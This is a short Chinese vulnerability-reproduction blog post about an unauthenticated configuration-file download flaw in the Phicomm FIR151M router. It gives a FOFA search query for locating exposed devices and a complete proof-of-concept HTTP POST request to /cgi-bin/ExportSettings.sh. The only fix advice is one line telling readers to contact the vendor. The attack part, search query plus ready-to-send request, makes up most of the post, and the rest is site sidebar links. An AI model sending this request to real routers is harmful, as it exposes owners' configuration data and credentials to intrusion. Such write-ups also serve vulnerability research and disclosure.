【漏洞复现】斐讯FIR151M路由器未授权下载漏洞

  • 开发
  • 31

Nx01 产品简介

        斐讯数据通信技术有限公司成立于2009年,是为用户提供智慧家庭领域智能产品和云服务的科技创新性企业。

Nx02 漏洞描述

        斐讯 FIR151M路由器配置文件未授权下载漏洞,攻击者可利用该漏洞获取敏感信息。

Nx03 产品主页

fofa-query: app="PHICOMM-FIR151M"

Nx04 漏洞复现

POC:

POST /cgi-bin/ExportSettings.sh HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 25
Host: {
  {Hostname}}
Pragma: no-cache
Connection: close

Export=%E5%A4%87%E4%BB%BD

Nx05 修复建议

建议联系软件厂商进行处理。

阅读全部

相关推荐

最近更新

  4. TCP协议是安全的吗?

    2024-02-07 16:46:06       18 阅读

  12. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-02-07 16:46:06       19 阅读

  13. 【Python教程】压缩PDF文件大小

    2024-02-07 16:46:06       18 阅读

  18. 通过文章id递归查询所有评论(xml)

    2024-02-07 16:46:06       20 阅读

热门阅读

  1. Vivado -RAM

    2024-02-07 16:46:06       28 阅读

  4. 读取7个数(1—50)的整数值,每读取一个值,程序打印出该值个数的 *。

    2024-02-07 16:46:06       26 阅读

  9. 电脑访问网站受限

    2024-02-07 16:46:06       29 阅读

  11. nginx upstream server主动健康检测模块ngx_http_upstream_check_module 使用和源码分析(下)

    2024-02-07 16:46:06       31 阅读

  12. C#字符串匹配(模式搜索)BF(Brute Force)暴力算法

    2024-02-07 16:46:06       29 阅读

  14. matlab | 一些总是忘记多次查的快捷键及符号

    2024-02-07 16:46:06       28 阅读

  17. C++二维vector转换为一维vector

    2024-02-07 16:46:06       31 阅读

  19. @ 代码随想录算法训练营第6周(C语言)|Day39(动态规划)

    2024-02-07 16:46:06       27 阅读

  21. std::vector<cv::Mat>和unsigned char** in_pixels 互相转换

    2024-02-07 16:46:06       32 阅读

  22. 《c++primer第5版》全书知识导图

    2024-02-07 16:46:06       30 阅读

  23. Selenium找界面元素

    2024-02-07 16:46:06       25 阅读

  28. C语言的联合体:一种节省内存的数据结构

    2024-02-07 16:46:06       25 阅读
  30. 02.05

    02.05

    2024-02-07 16:46:06      33 阅读